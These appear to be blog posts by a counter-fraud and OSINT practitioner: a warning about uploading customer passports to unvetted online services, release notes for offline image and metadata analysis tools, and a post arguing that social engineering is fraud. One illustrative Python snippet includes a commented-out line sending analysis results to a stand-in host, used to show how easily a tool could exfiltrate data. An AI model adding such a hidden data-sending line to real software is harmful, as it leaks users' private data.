
Please don’t use unknown online services for customer verification.

I didn’t really know how to title this post, as the above seems almost too obvious. Unfortunately, I’ve found more and more private sector companies using random online services for customer verification and ‘OSINT’ work. I was finally prompted to write this after seeing a company upload a customer’s passport to Forensically (which is a fantastic site) and then a popular reverse image search site. I believe Forensically and the reverse image site are both above board, but I don’t know that, and neither did they when they uploaded the passport.

The issue isn’t just that this is happening, but that those I’ve spoken to just don’t understand why it’s an issue. This is even in the wake of GDPR (which you’ll be painfully aware of if you’re in Europe). What’s most confusing about all this is that those working in counter-fraud/customer verifications know how attractive photos of passports and the like are to criminals, but they don’t seem to make the connection between using random online services and the potential for criminality.

Since challenging a few companies, the two phrases I’ve heard on repeat are:
“We’ve checked the site’s code of conduct/details and it’s fine” or “We’ve checked the code and nothing gets ‘uploaded’ anywhere – it’s all on-page JavaScript, etc.”

This might be true at 9am, but it might have changed by 10:30am – have you checked again? Each time you uploaded something? Really?

A random site on the internet has nothing to stop it doing whatever it likes, and changing what it does at will. What if your favourite reverse image search tool decided one day to start publishing all the pictures you’ve reverse searched somewhere? Would you know if it changed? Would your staff? What would you be able to do about it?

Similarly with tools that run entirely ‘on page’ and don’t upload the data to a server – would you know if that changed? It’s usually a single line of code to dump all of the results to a server somewhere.
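To make the point concrete, here’s a hypothetical sketch (in Python rather than on-page JavaScript, with made-up names and a made-up URL) of just how small that change is – one added line turns a fully local analyser into one that ships your results off somewhere:

```python
import json
import urllib.request


def analyse(image_bytes: bytes) -> dict:
    """Stand-in for a 'completely local' analysis routine."""
    results = {"size_bytes": len(image_bytes)}
    # The single line that would change everything -- left commented out:
    # urllib.request.urlopen("https://example.com/collect",
    #                        data=json.dumps(results).encode())
    return results
```

Nothing about the function’s visible behaviour changes when that line is added, which is exactly why re-checking the code once isn’t enough.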

Not to ramp up the scare tactics, but I’ve personally heard of a few people running free online services getting shady offers involving skimming data, and it only takes a few bad days to make those offers seem a lot more appealing. Obviously this can happen in any business context, but it’s far more likely when accepting the offer doesn’t break any contracts.

How can I properly procure an online service?

The first step with using anything to process customer data is always to get straight on the phone to your legal department. There’s no substitute for proper legal advice, and with data being such a hot issue at the moment, it’s vital to stay on the right side of the law with it all.

As some more general guidelines if you haven’t got a great legal department:
If you can’t get something that works completely offline (and make sure it’s properly firewalled off), you need a proper, legally binding agreement. If you’re in Europe, for each service you use you’ll need a ‘data processor agreement’ to achieve basic compliance. Even if you’re not based in Europe, you’re still going to run into trouble if you don’t have a similar sort of agreement in place. The agreement doesn’t need to be a 300-page tome – I’ve seen perfectly acceptable agreements on two sides of A4.

When dealing with any supplier, make sure to ask what happens with the data – do they store it? How long for? Do they have external auditing procedures? This all needs to be in writing. Often suppliers will have a boilerplate contract which won’t go into much detail – ignore these (or fill them out if you must) and send over a list of all your questions and write your own contract up. My advice is to make the questions as direct as possible and with as little wiggle room as possible. Don’t allow for responses like ‘we keep your data for as long as is reasonable’ – you want it in a numerical format. If they can’t give you an exact timeframe, write your own clause in – ‘as soon as possible, but always within x weeks/months’. Ideally, they shouldn’t store anything at all, but this somehow seems impossible for most services.

You also need to make sure that you’re notified of any changes to their service. This can be a tricky one to negotiate, as most companies will only really want to notify you of big updates or changes. Don’t settle for this – you need to be informed of any change to the live code base, and to have a designated point of contact to talk these changes through. You also need to be able to leave the contract if any of the changes aren’t to your liking.

Final Notes

I know this all sounds like common sense, but somehow the risks get forgotten somewhere down the line. Even in the last year or two – despite all the data leaks we’ve seen – some counter-fraud and verification teams are still using online services on faith alone. Check what you’re using, how you’re using it, and whether you have everything you need in place.

Image Interrogator – v0.2 released!

This release has mainly been about smartening up the interface, as it would sometimes get thrown off by certain image sizes, too much metadata, too little metadata and pretty much anything else.

  • Made the interface not overlap, and not panic so much when it gets very large or small images.
  • Added a rough image-resize ability for really big pictures. It’s not a good idea to do something like Error Level Analysis on a resized image, so the resize resets when you adjust the image, apply filters or run Error Level Analysis.
  • Prevented Image Interrogator from creating a temporary file when doing ELA – previously this stopped the software from running in some directories.
  • Squashed some bugs
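For anyone wondering what Error Level Analysis actually does under the hood, here’s a rough, hypothetical sketch of the standard technique using Pillow – not Image Interrogator’s actual code. It also shows why no temporary file is needed: the re-save can happen entirely in memory.

```python
import io

from PIL import Image, ImageChops, ImageEnhance


def error_level_analysis(path, quality=90, scale=15):
    """Re-save the image as JPEG and amplify the per-pixel difference.

    Regions edited after the image's last save compress differently,
    so they stand out in the brightened difference image.
    """
    original = Image.open(path).convert("RGB")
    buffer = io.BytesIO()  # in-memory re-save, no temporary file needed
    original.save(buffer, "JPEG", quality=quality)
    buffer.seek(0)
    resaved = Image.open(buffer).convert("RGB")
    difference = ImageChops.difference(original, resaved)
    return ImageEnhance.Brightness(difference).enhance(scale)
```

This is also why running ELA on a resized image is misleading – resizing re-encodes every pixel, wiping out the compression history the technique relies on.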

Get it here:

The next release will possibly add wavelet analysis and hopefully speed the software up even further.

Image Interrogator v0.1 Released

I’ve been relatively quiet for the last few months, and that’s because I’ve been working on a completely new tool for analysing images. This aims to be a much leaner, lightweight tool for those that just need to quickly analyse an image for obvious manipulation.

Get it here:

Windows: Image Interrogator v0.1 (hosted on GitHub)

The main features of Image Interrogator are as follows:

  1. Error Level Analysis
  2. Image adjustments (sharpening, contrast, edge detection etc.)
  3. Basic Metadata Analysis
  4. Completely offline.
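As a flavour of what ‘basic metadata analysis’ involves, here’s a hypothetical few lines using Pillow’s EXIF support – Image Interrogator’s actual implementation may well differ:

```python
from PIL import ExifTags, Image


def read_exif(path: str) -> dict:
    """Read an image's EXIF data, mapping raw tag IDs to readable names."""
    exif = Image.open(path).getexif()
    return {ExifTags.TAGS.get(tag_id, tag_id): value
            for tag_id, value in exif.items()}
```

A freshly created image has no EXIF at all, so an empty result from a supposedly camera-taken photo is itself a point of interest.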

There were a few reasons behind creating this tool:
First and foremost, a number of customer verification and counter-fraud teams I’ve worked with have expressed a need for a really quick tool for some basic (primarily visual) analysis before diving into the metadata and further checks. Their main tool currently seems to be Paint, so anything is an upgrade at that point.

Secondly, whilst there are some great online tools for visual analysis methodologies like Error Level Analysis (a prime example being Forensically), it’s difficult to find offline tools that do the same thing. Using online tools can be risky, and (seriously) in Europe you need to make sure you have a data processing agreement with each online service you use to analyse images, so it’s important to have an offline option. This software doesn’t phone home at all, so feel free to block it in your firewall (as you should with all software that doesn’t specifically need to use the internet!).

Finally, I’ve been using the fantastic Nuitka in the creation of this tool – for the non-techy, it basically turns the code into a much faster, smaller program. Metadata Interrogator will be using this shortly to make it run faster (with a slightly smaller file size, much to the delight of those with ’90s HDDs), but it’s a lot of work due to the third-party libraries MI uses, so Image Interrogator is a way to get to grips with Nuitka before making the big changeover.

As always, let me know your thoughts, comments, prophecies and predictions.

v0.7 released!

It’s been a while but here’s a new release!

I’ve added a new passport MRZ resolver, as it’s been quite a requested function – most of the tools available are online-only, and whilst I’m sure they don’t scrape any data, it’s always good to be careful.

IPTC and PDF metadata handling was a little lacking previously – it was getting the main fields but getting stuck on some of the (admittedly less useful) ones. It should gather it all now. I’ve also made MI a lot better at grabbing creation-type dates (still be careful with these!).
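For the curious, the core of any MRZ resolver is the ICAO Doc 9303 check-digit scheme, which is easy to verify completely offline. A minimal sketch (not MI’s actual code):

```python
def mrz_check_digit(field: str) -> int:
    """ICAO 9303 check digit: weight characters by 7, 3, 1 repeating."""
    weights = (7, 3, 1)
    total = 0
    for i, ch in enumerate(field):
        if ch.isdigit():
            value = int(ch)
        elif ch.isalpha():
            value = ord(ch.upper()) - ord("A") + 10  # A=10 ... Z=35
        else:  # the '<' filler character counts as zero
            value = 0
        total += value * weights[i % 3]
    return total % 10


# The specimen document number from ICAO Doc 9303 has check digit 6:
assert mrz_check_digit("L898902C3") == 6
```

Validating these digits against the ones printed in the MRZ is a quick offline sanity check on a document photo, with no need to send the passport anywhere.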

v0.7 – Callahan

  • Passport MRZ resolver. This is extremely alpha, but was requested by a few companies using MI as most tools for that are online.
  • Formatting/display improvements.
  • IPTC metadata now displays properly.
  • All fields added/calculated by MI (and not part of the metadata) now start with a *
  • MI tries harder to find a creation date – still be careful with this.
  • More metadata from PDF files, and removed some useless values.
  • ‘Select Folder’ now works again.

Get it here:

Social Engineering – basically just fraud.

I’ve been doing Open Source Intelligence (OSINT) gathering professionally for quite a while now – back from the days when it was just a GeoCities check to see if the subject had been ridiculous enough to create a page dedicated to their criminal enterprise (surprisingly/unsurprisingly, this was very common). However, I’ve only recently shuffled my way into the OSINT ‘scene’ which has popped up on Reddit/Twitter/forums. It’s great to see that there’s a network of people passionate about the subject area and there is a lot of great sharing and caring going on.

However, as with any community, a lot of buzzwords creep in, it starts to become a ‘club’, and newcomers flock in with wildly varying levels of experience. It’s great that things are opening up as it all adds new perspectives, but since getting involved I’ve seen a lot of people posting methodologies and suggestions which are…well, pretty much just illegal. There’s no way to sugar coat it, and it doesn’t matter what jurisdiction you’re in: some of what is being shared as ‘OSINT methodologies’ falls directly into harassment, stalking or fraud.

The main offender for this is ‘Social Engineering’.

Social Engineering – what it is.

The Wikipedia entry for Social Engineering (the closest we can get to a current consensus on the term) is:

Social engineering, in the context of information security, refers to psychological manipulation of people into performing actions or divulging confidential information.

For anyone unsure of what Social Engineering is (which seems to be a lot of people), this video is the single best explanation:

As you can see, it’s basically lying to someone to get what you want via invoking the most holy trinity of the BLT. This is otherwise known as fraud.

Here are the UK and US definitions of fraud, in case anyone has forgotten:

Fraud Act 2006 (Section 2)

[A person commits fraud if they make…] a false representation, dishonestly, knowing that the representation was or might be untrue or misleading, with intent to make a gain for himself or another, to cause loss to another or to expose another to risk of loss.

US Code 18 (it’s a bit trickier in the US as there are many laws to choose from which cover it):

Whoever falsely and willfully represents himself to be a citizen of the United States shall be fined under this title or imprisoned not more than three years, or both.

(Many more under Chapter 47, Chapter 63 and stated cases)

Let’s take the UK definition and apply it to our man Crash Override. He makes a false representation straight out by saying he’s “Mr Eddie Vedder from accounting”. He knows this is untrue and misleading, and he does it for gain (to get access to the modem number). It’s pretty straightforward.

As you can see, the definition of social engineering is just fraud by another name. Now some might start arguing that ‘manipulation’ doesn’t have to involve fraud, but I honestly can’t think of a ‘manipulation’ which wouldn’t be fraudulent in some way by most legal systems.

That isn’t what *I* mean though.

In computer security discussions, the term ‘social engineering’ is well understood – it’s the phishing scams and ransomware attacks. However, this term, which most people seem to understand in the context of compsec, somehow gets distorted when we talk about OSINT – I’ve seen posts saying things like ‘if that doesn’t work, try a bit of social engineering to see if you can find out x’ or ‘I couldn’t find out anything online so I used social engineering to get what I needed’.

Now I don’t think that people are quite recommending ransomware or similar – it’s more likely one of the below:

  • The writer doesn’t really understand what ‘social engineering’ is and just uses it as a buzzword for anything from adding a subject as a friend on Facebook to holding their spouse hostage.
  • They’re using it to reference social media OSINT methodologies.
  • The writer doesn’t want to say ‘lie to them to get what you want’.

Now the first one is a distinct possibility – we’ve all heard countless people use phrases in that sort of clunky, ‘I’ve-only-heard-this-at-a-conference’ way and I feel that a lot of people are using the term Social Engineering to sound a bit more ‘exciting’. It certainly sounds cooler than ‘…and then I looked at his Facebook feed until my eyes turned into sandpaper-y cubes.’

The second I think is mostly a way for OSINT practitioners to flag up that they do ‘social media stuff’ as well as Experian checks. I’ve been to a number of conferences recently where a worried director exclaims ‘won’t someone think of the social media platforms!’ after too much talking about any other type of OSINT service (or whilst the speaker is just taking a breath) and ‘social engineering’ sounds like they know how to do the facebooks.

More than that, I think some ‘OSINT evangelists’ are also trying to push such language in a marketing sense – the whole ‘we’re willing to go to the very edge of legality/I can kill a man with my intersects alone’ vibe sells contracts unfortunately.

I know. Why is this important?

Mostly because I feel there’s a lingering misunderstanding that using the word OSINT makes you somehow exempt from the usual rules. It’s the same as the ‘if it’s on the net then I can do what I like with it’ misconception.

Everyone who has been involved in this field in a professional setting knows that isn’t the case, but unfortunately a lot of newcomers seem to believe that there’s some sort of magical get-out-of-jail-free card available under the umbrella of ‘doing OSINT’. It’s always been a problem, but using ‘criminal’ terms like social engineering in a ‘valid tactic’ sort of way starts to muddy the water more than ever.

This is compounded by a mix up of what is acceptable when hired to do security/pentesting, and what is acceptable without such a contract – this may seem obvious to some, but for newcomers it’s not. They read @OSINT_BLACK_OPS_SN1PER_HACK3R tweet ‘wasn’t getting anywhere on my new contract so did a bit of social engineering and now I’m the CEO’s dentist’ and think ‘I’m learning how to do OSINT gathering! I’ll social engineer my local gardening club and see what Margery is really up to!’

Instead of the 50k bonus and as much mouthwash as he can swig for the rest of his life, our intrepid newbie ends up having awkward bedtime chats with cellmate and fellow stalker Profusely Sweaty Greg, all the while wondering why the magical shield of ‘just OSINT’ing’ didn’t protect him.

For some, this whole post will seem very patronising and obvious – to others, it will seem like pedantry. I understand this, and I’m not trying to say that we should jealously guard our secrets or make the community any less welcoming to newcomers. But for those who are experienced, I’d really like to ask you to share your knowledge responsibly and throw in a quick comment the next time you see someone being told to ‘do a bit of social engineering’.

The road map from v0.6 to v0.7

Version 0.6 has been a bit of a turning point for the project – I’d say that Metadata Interrogator now does what I wanted it to do when I set out to create it. I wouldn’t say it’s reached ‘v1.0’ yet, but it analyses a whole raft of metadata beyond just the usual EXIF data, it has a useful timeline, and it highlights interesting data both in comparisons between files and across a whole data set.

As it’s got to that stage, I don’t think it’s necessary to do quite so many small iterations, so the move between 0.6 and 0.7 is going to be a big one and take some time. The below is a sort of road map of where I want to take the project.

  1. Performance – This is the big one; currently it takes far too long to load up and analyse files. To try to get better performance (and maybe a smaller file size?!) I’ll try to port it across to Nuitka. I’ve heard fantastic things about it, and I’m sure it’ll improve things no end. Early tests have not ended well, however, so time will tell if I can gather together enough goat entrails and black candles to make this work.
  2. Release on Mac and Linux – I’m holding off on this till I sort out Nuitka, but it’s a main priority after that.
  3. Installer version – Whether this is necessary depends on the gains I get from Nuitka – if they’re impressive I’ll keep it portable, however if not I’ll add a version that can be installed which will give faster access for regular users.
  4. Pre-computed Analysis – One thing I’m very interested in is analysing large data sets of files to work out what ‘normal’ metadata drift on a single device looks like – as in, how many (and which) fields change as one smartphone takes 100 different pictures. This will then be built into the software to highlight where the differences aren’t ‘normal’.
  5. Overhaul the UI – The UI works, but it’s still a bit janky in parts. This isn’t a top priority as it all seems to work roughly fine for me, but it’s not ideal.

As always, any comments or suggestions would be great.

v0.6 Released!

This release is a particularly big one (like the last) and has some major changes in it. Firstly, I’m now using matplotlib for the analysis timeline, so it looks much, much better and allows for things like colour coding. Whilst it does bring a small performance drop with it, I’ll be using it for more analysis graphics in the future, so I think it’s worthwhile. I’ve also made a lot of improvements to the data set analysis and match analysis functions.

This will probably be the last incremental release for a while – I’ll be publishing a road map shortly which shows what’s next on the agenda, but I feel it’s in a state now where Metadata Interrogator fulfils all of my original needs.

Change Log:

  • Migrated the timeline to matplotlib – this slightly slows down the loading time, but I think it’s well worth it and it will be used for more analysis graphics in the future.
  • The timeline has been drastically improved, with a much better layout and ability to handle high numbers of files.
  • Colour coding for different file types has been implemented on the timeline.
  • The data set analysis function has been improved, and now lists file types in the set.
  • The file comparison function has been improved to more accurately show differences.
  • Minor performance improvements across the board, especially in analysis times.

Get it here:

v0.5 Released!

This release of Metadata Interrogator is a bit of a turning point – it’s a lot more stable now and I feel that most of the bugs have been ironed out. I’ve also started on the ‘Data set analysis’ feature – this analyses all the files currently in the data table and looks for things of interest. At the moment it’s very basic, but I’ll be expanding it soon.

As always, if you have any requests for features in this exif and metadata analyser, I’d be very interested to hear them and then complain about how difficult it would be to implement them.

Change Log:

  • Basic Data Set Analysis; currently extremely basic, but it’s being worked on.
  • The only good bug is a dead bug, and I’ve squashed a lot of bugs.
  • New fancy icons.
  • MI should throw up more errors if you try to do something…erroneous.
  • Some very minor performance improvements.

Get it here: